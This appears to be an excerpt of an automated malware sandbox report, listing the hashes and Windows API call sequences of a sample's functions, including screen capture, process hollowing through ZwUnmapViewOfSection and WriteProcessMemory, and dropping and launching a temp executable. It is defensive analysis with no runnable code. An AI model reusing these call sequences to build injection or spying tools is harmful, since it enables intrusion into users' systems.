                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: >G
                                        • API String ID: 0-1296849874
                                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                        • Instruction ID: aab5066b8351c21b9abf1b6184216a89ccb323a2d5e30b0bcb97f0d730efd77d
                                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                        • Instruction Fuzzy Hash: 08112BF724808243DE74863DC8B46B7A795EBCD321F2C637BD0C14BB58D32A99459908
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: HeapProcess
                                        • String ID:
                                        • API String ID: 54951025-0
                                        • Opcode ID: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                        • Instruction ID: 9504a653bcf427532d5064532c05f1d04939bb5561e35e6535c2a7eba45b7a60
                                        • Opcode Fuzzy Hash: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                        • Instruction Fuzzy Hash: 84A00270506201CB57404F756F0525937D9654559170580755409C5571D62585905615
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b5ca945c73f96586680b794a2cfc8b55e8f7bc2f58380cec5295694457d85c5e
                                        • Instruction ID: ab2fb9cf530b2f7fc05e48a1b2542d0b548931935014995ce621e12a70c45bd8
                                        • Opcode Fuzzy Hash: b5ca945c73f96586680b794a2cfc8b55e8f7bc2f58380cec5295694457d85c5e
                                        • Instruction Fuzzy Hash: D6324621D29F414DE7639634C862336A649AFB73C5F18D737E81AB5AAAEF2CC4C34105
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 56ea352148e3c774f87dcc4cf0de5d49bee8f4798448973f894b3d9cfc24b1ba
                                        • Instruction ID: 00ae404e09403cbabe28ca0a0a4d3aceb2ea5bd9e999d2a250848967357f0a7a
                                        • Opcode Fuzzy Hash: 56ea352148e3c774f87dcc4cf0de5d49bee8f4798448973f894b3d9cfc24b1ba
                                        • Instruction Fuzzy Hash: E532E3796083469BD714CF2AC4807ABB7E1BF84304F444A2EFC958B381D778DD858B8A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 63c6752c91fa09a59911cbec739b695d928ea4d41f79e3f210d04f564ca51bf4
                                        • Instruction ID: 9583adf114605d02d5e2e19679ce9bf42d3b47f395d82ba1fcfe18c7509b5e77
                                        • Opcode Fuzzy Hash: 63c6752c91fa09a59911cbec739b695d928ea4d41f79e3f210d04f564ca51bf4
                                        • Instruction Fuzzy Hash: 59028E717046518FD318CF2EE880536B7E1AF8E301B46867EE586C7391EB34E922CB95
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5fde6092dbaeb595df6386206e95cc36bec498aab372ae6033ef90cb0bf67f56
                                        • Instruction ID: 08c65c0034c77f162a5e2f762c8ff88aaa906a6fc17fd64b80a7c511c0c0ca56
                                        • Opcode Fuzzy Hash: 5fde6092dbaeb595df6386206e95cc36bec498aab372ae6033ef90cb0bf67f56
                                        • Instruction Fuzzy Hash: A3F14B716142548FC314DF1DE89187B73E0BB8A301B460A2EF5C2D7392DB78EA1ADB56
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 60a407b7035b458234a1b4ae8876206eb8531d1806f2b32c6b298a9738e91288
                                        • Instruction ID: 6072d2ab819a24c58290f472cacd0ace346509952e007a1e49c4d5c76d6a9cd3
                                        • Opcode Fuzzy Hash: 60a407b7035b458234a1b4ae8876206eb8531d1806f2b32c6b298a9738e91288
                                        • Instruction Fuzzy Hash: 90D1BF71A083558BC724DE29C88096FB7E4FF88354F442A2EF89597320EB38DD05CB86
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e7326b31f45d4e50c8c50174bee11f9882207dfed74e31d12f4697374e1987de
                                        • Instruction ID: b3ed2c0ab3c8a1cf02cd55a458d72155988f8fbc7d55d27d708debdf014431d3
                                        • Opcode Fuzzy Hash: e7326b31f45d4e50c8c50174bee11f9882207dfed74e31d12f4697374e1987de
                                        • Instruction Fuzzy Hash: AEB1A17951429A8ACB01EF68C4913F63BA1EF6A300F4850B9EC9CCF757D3398506EB24
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                        • Instruction ID: 74e2ef470e0f7eaec2bbcc97644f24ba1b58e581bc817aa34aafa8545d81d3a7
                                        • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                        • Instruction Fuzzy Hash: D791A8722080A319D72D423E847403FFFE19A563A1B1BA79FD4F2CB2C5EE18D565DA24
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                        • Instruction ID: 8d8b5119396e2834e670033089963a3e86919695436a47c170bc2bcb8e078ffc
                                        • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                        • Instruction Fuzzy Hash: A691A7762080E35DDB294639843403FFFE15A563A1B1B67AFE4F2CB2C5EE18C568D624
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                        • Instruction ID: eaa300f4f162f1acbdde4decff541324e593f013a6a572b7afaac19ec25842a6
                                        • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                        • Instruction Fuzzy Hash: F99195722090A319DB2D4239843403FFFE15E5A3A1B1BA79FD4F2CB2C5EE28C564D624
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                        • Instruction ID: 9b9e3495b2600b5bb57a0f881f66ff577775c96cdfa749367535f2d08535ee8a
                                        • Opcode Fuzzy Hash: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                        • Instruction Fuzzy Hash: A3615871E0060867DE386928BC56BBF63A9EB4D304F14395BE883DB381C65DDD42835E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                        • Instruction ID: 82e4230dd5615ab793e8164ae3cdd09518d68db03ee48e672ae2bd39712f48c3
                                        • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                        • Instruction Fuzzy Hash: FF81EA722080A31DDB2D4239853803FFFE15A563A5B1BA7AFD4F2CB2C5EE18C564D624
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                        • Instruction ID: 1ecc17c6f396bdcf1bd7e257d91ac660bf1aa2674e3e23ad4d3769e79eae6022
                                        • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                        • Instruction Fuzzy Hash: 9751647160460D4BDB34EA6895E77BFA3899B0E344F18350BE582F7782C61DAD02939E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aab2813c665c480545fef87c0c14cb93031e59ded8cfa1b4e39f94410d0708d9
                                        • Instruction ID: 630ecb88457be3648657eb57e3c78cf78304789516621443522bf01dd35d6fbf
                                        • Opcode Fuzzy Hash: aab2813c665c480545fef87c0c14cb93031e59ded8cfa1b4e39f94410d0708d9
                                        • Instruction Fuzzy Hash: 81616F32A083159FC308DF75E581A5BB7E5BFCC718F450E1EF489DA151E634EA088B86
                                        APIs
                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FC9
                                        • CreateCompatibleDC.GDI32(00000000), ref: 00417FD4
                                          • Part of subcall function 00418462: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418492
                                        • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418055
                                        • DeleteDC.GDI32(?), ref: 0041806D
                                        • DeleteDC.GDI32(00000000), ref: 00418070
                                        • SelectObject.GDI32(00000000,00000000), ref: 0041807B
                                        • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 004180A3
                                        • GetCursorInfo.USER32(?), ref: 004180C5
                                        • GetIconInfo.USER32(?,?), ref: 004180DB
                                        • DeleteObject.GDI32(?), ref: 0041810A
                                        • DeleteObject.GDI32(?), ref: 00418117
                                        • DrawIcon.USER32(00000000,?,?,?), ref: 00418124
                                        • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418154
                                        • GetObjectA.GDI32(?,00000018,?), ref: 00418183
                                        • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181CC
                                        • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181EF
                                        • GlobalAlloc.KERNEL32(00000000,?), ref: 00418258
                                        • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041827B
                                        • DeleteDC.GDI32(?), ref: 0041828F
                                        • DeleteDC.GDI32(00000000), ref: 00418292
                                        • DeleteObject.GDI32(00000000), ref: 00418295
                                        • GlobalFree.KERNEL32(00CC0020), ref: 004182A0
                                        • DeleteObject.GDI32(00000000), ref: 00418354
                                        • GlobalFree.KERNEL32(?), ref: 0041835B
                                        • DeleteDC.GDI32(?), ref: 0041836B
                                        • DeleteDC.GDI32(00000000), ref: 00418376
                                        • DeleteDC.GDI32(?), ref: 004183A8
                                        • DeleteDC.GDI32(00000000), ref: 004183AB
                                        • DeleteObject.GDI32(?), ref: 004183B1
                                        Similarity
                                        • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconInfoLocal$BitmapBitsCursorDisplayDrawEnumSelectSettingsStretch
                                        • String ID: DISPLAY
                                        • API String ID: 1352755160-865373369
                                        APIs
                                        • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                                        • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                                        • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                                        • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                                        • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                                        • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                                        • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                        • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                        • GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
                                        • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                        • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                                        • SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                        • ResumeThread.KERNEL32(?), ref: 00417582
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                        • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                        • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                        • GetLastError.KERNEL32 ref: 004175C7
                                        Similarity
                                        • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                        • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`Wu$ntdll
                                        • API String ID: 4188446516-529412701
                                        APIs
                                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                        • ExitProcess.KERNEL32 ref: 0041151D
                                          • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                          • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                          • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                          • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                        • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                        • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                          • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                          • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                          • Part of subcall function 004127D5: RegCloseKey.KERNEL32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                        • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                        • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                        • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                        • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                          • Part of subcall function 0041B59F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040A009,?,00000000,00000000), ref: 0041B5FB
                                          • Part of subcall function 0041B59F: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A009,?,00000000,00000000), ref: 0041B60F
                                          • Part of subcall function 0041B59F: CloseHandle.KERNEL32(00000000,?,0040A009,?,00000000,00000000), ref: 0041B61C
                                        • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                        • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                        • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                        • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                          • Part of subcall function 0041B59F: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6B5,00000000,00000000,?), ref: 0041B5DE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                        • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                        • API String ID: 4250697656-2665858469
                                        • Opcode ID: 5dbcded7602185ea070b480d70fb33acaad7b421ae312c9c840d883bd3e5244d
